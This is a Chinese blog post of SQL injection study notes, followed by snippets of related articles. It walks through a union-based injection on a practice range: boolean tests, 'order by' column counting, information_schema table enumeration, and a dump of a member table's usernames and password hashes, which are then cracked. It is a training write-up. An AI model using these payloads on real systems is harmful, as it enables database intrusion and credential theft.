sql注入学习笔记

最新推荐文章于 2025-02-06 08:46:23 发布
原创 最新推荐文章于 2025-02-06 08:46:23 发布 · 243 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文深入讲解了SQL注入攻击的技术原理,包括如何通过网页上的MYSQL查询语句查询未做过滤的数据库,以及在墨客网靶场进行实战尝试的方法。文章详细演示了如何测试SQL语句,判断字段数量,以及利用union select进行数据爆破的过程。

基础介绍:https://blog.51cto.com/13520190/2126037

比较专业的介绍:https://blog.youkuaiyun.com/weixin_39789689/article/details/81089510

分类:https://www.cnblogs.com/JetpropelledSnake/p/9017949.html

个人向工具:http://www.vuln.cn/9027

最全爆破:https://www.cnblogs.com/spadd/p/4085544.html

技术原理:在网页上,通过MYSQL查询语句,可以查询服务器的数据库(未做安全过滤)。

实战尝试:墨客网靶场http://219.153.49.228:40125/(强烈推荐新手使用,评论多,入门简单)

主界面:

点击通知进入一个目录:

页面提交:http://219.153.49.228:40125/new_list.php?id=1

数据库执行语句:select * from news where id=1

页面返回内容正常,说明这有个注入点(?)

      

测试SQL语句

页面提交:http://219.153.49.228:40125/new_list.php?id=1 and 1=1

数据库执行语句:select * from news where id=1 and 1=1

页面显示和之前一样,测试SQL语句成功

页面提交:http://219.153.49.228:40125/new_list.php?id=1 and 1=2

数据库执行语句:select * from news where id=1 and 1=2

返回内容为空

字段判断:order by n

页面提交:http://219.153.49.228:40125/new_list.php?id=1%20order%20by%203

数据库执行语句:select * from news where id=1 order by 3

当order by 5时,返回内容为空,说明有4个字段

页面提交:http://219.153.49.228:40125/new_list.php?id=1 and 1=2 union select 1,2,3,4

这里卡了很久,因为刚开始没有加1=2,因此返回界面还是正常。加1=2是将前面的内容false掉,只显示后面的内容

数据库执行语句:select * from news where id=1 and 1=2 union select 1,2,3,4

页面返回描述:在原来的标题上位置显示为2,内容的位置显示为3

分析:通过SQL语句中and 1=2 union select 1,2,3……,n联合查询,判断显示的是哪些字段,就是原本显示标题和内容时候的查询字段,原本的查询应该是select id,title,contents,? from "table" where id=1,也就是说title标题是第2个位置显示,contents内容是在第三个位置显示。

开始爆破嘿嘿嘿

页面提交:http://219.153.49.228:49448/new_list.php?id=1%20and%201=3%20union%20select%201,database(),3,4

在2的位置显示数据库

页面提交:union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema like database()

group_concat(table_name)是将table_name连在一起,

information_schema.tables 是常见的表,可以通过它查到所以表

提交:网址+id=1+0+union select 1,2,group_concat(column_name),4 from information_schema.columns where table_name like 'StormGroup_member'

提交:union select 1,2,group_concat(name,"-",password,"-",status),4 from stormgroup_member

找到用户名和密码,可以看出是加密的,估计是md5,尝试用md5解迷

结果是dsan13和771310

 

 

 

SQL注入基础学习(笔记)
部分学习记录
07-29 759
此文为自己学习SQL注入基础的笔记,由于是从某书直接复制过来的,存在格式问题,不过对于阅读应该影响不大,在此留个痕迹,便于以后复习和查阅,也希望能给刚刚开始学习的盆友们一点帮助吧。(不喜勿喷,谢谢) #GET基于报错的SQL注入 #GET基于报错的SQL注入发现 注入类型:数字、字符(单引号、双引号、双单引号、括号)、反斜杠 注入点?id=1 ##less-1 输入:’ 报错: 分析: ‘‘1’’ LIMIT 0,1’ 发现 ‘1’’ LIMIT 0,1 中多了一个单引号,推测输入内容为单引号引起来的字
sql注入学习笔记-dvwa实战
xuqide77的博客
03-12 703
目录一、sql注入基础二、sql注入之union注入实战-dvwa1.先判断是数字型还是字符型2.使用order by查询出表的字段数量3.利用联合注入查询数据库名称、表、字段、字段数据 一、sql注入基础 sql注入就是指Web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击可控的,并且参数带入数据库查询,攻击者可以通过构造不同的sql语句来实现对数据库的任意操作。 sql注入漏洞的产生需要满足两个条件 (1)参数用户可控:前端传给后端的参数内容是用户可以控制的 (2)参数带入数据库查询:
sql注入笔记
lxw1844912514的博客
11-03 574
1.什么是sql注入sql注入是将sql代码添加到输入参数中,传递sql服务器解析并执行的一种攻击手法。 sql参数未经过滤直接拼接到sql语句当中, 解析执行,到达预想之外的效果 $sql=" select * fromwhere id=-1 OR 1=1"; //OR 1=1 条件查询整张表的 2.sql注入是怎么产生的 web开发人员无法...
SQL注入学习笔记
qq_52560434的博客
09-26 2017
SQL注入大致的方法步骤原理思路注入类型SQL注入相关例题 原理 SQL注入,简单的说就是在post/getweb表单、输入域名或页面请求的查询字符串中插入SQL命令,最终使web服务器执行恶意命令的过程。 思路 (1)找注入点,构造特殊语句 (2)收集后台数据库信息,判断数据库类型,确定注入的方式。 (3)通过构造的特殊语句返回的结果,查询表名、列名、字段名以及字段值,猜解用户名和密码。 (4)找到后台可以登录的地址,进一步提权,入侵Web服务器和数据库服务器等。 注入类型 这里按照执行之后的效果来分,一
Sql注入学习笔记——MySQL显错注入
qq_44720214的博客
07-26 1425
显错注入又叫报错注入,其原理是通过利用数据库的某些机制,人为地制造错误条件使得查询结果能够出现在错误信息中。
CTF SQL注入学习笔记
最新发布
2401_86190146的博客
02-06 1184
部分内容来自于SQL注入由简入精_哔哩哔哩_bilibili1.mysqli_error():返回最近调用函数的最后一个错误描述语法:mysqli_error(connection) 规定要使用的Mysql连接; 返回一个带有错误描述的字符串。如果没有错误发生则返回 ""2.mysqli_errno() :函数返回最近调用函数的最后一个错误代码。语法:mysqli_errno(connection);返回错误代码值。如果没有错误发生则返回 0。3.mysqli_fetch_array():从结果集中取得一行
sql注入学习笔记
m0_52341820的博客
04-14 416
一、Mysql基础知识 1、注释 单行注释 # 多行注释 /* */ 单行注释 --空格 一般用-- + 内联注释 /*!5001*/ 注释掉的内容只有高版本的mysql才会执行 2、语句 语句/函数 解释/功能 示例 union 用来拼接两个select语句,每个查询必须拥有相同列数,结果等于等一个select语句中的列名,默认选取不同值,允许重复值用union all ...
SQL注入笔记
02-07
SQL注入笔记 对于新手学习SQL注入很有帮助 欢迎大家查看
SQL注入学习笔记
星落
11-04 1317
SQL 注入就是指 web应用程序对用户输入的数据合法性没有过滤或者是判断,前端传入的参数是攻击者可以控制,并且参数带入数据库的查询,攻击者可以通过构造恶意的 sql语句来实现对数据库的任意操作;即通过把sql命令插入到Web表单提交或输入域名或页面请求的查询字符串中,最终欺骗服务器执行恶意的SQL命令
关于SQL注入
你只有踏出第一步,下一步才会跟着来,否则你将永远停留在原地。
11-07 274
今天看视频看到了sql注入这个问题,然后通过自己的实际操作也使用这个手段直接从界面操作到了自己的数据库,感觉这个技术有点强,就去网上查了查。 Sql 注入的定义是SQL是操作数据库数据的结构化查询语言,网页的应用数据和后台数据库中的数据进行交互时会采用SQL。而SQL注入是将Web页面的原URL、表单域或数据包输入的参数,修改拼接成SQL语句,传递给Web服务器,进而传给数据库服务器以执行数据库命令。如Web应用程序的开发人员对用户所输入的数据或cookie等内容不进行过滤或验证...
VC++结合SQL编程的学习笔记精华
学习笔记可能包括了如何在VC++程序中安全地处理用户输入,防止SQL注入攻击,以及如何在SQL中管理用户权限和角色等安全策略。 描述中重复强调的“VC++ SQL 学习笔记”表示该文档是学习VC++与SQL结合使用时的一些心得...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值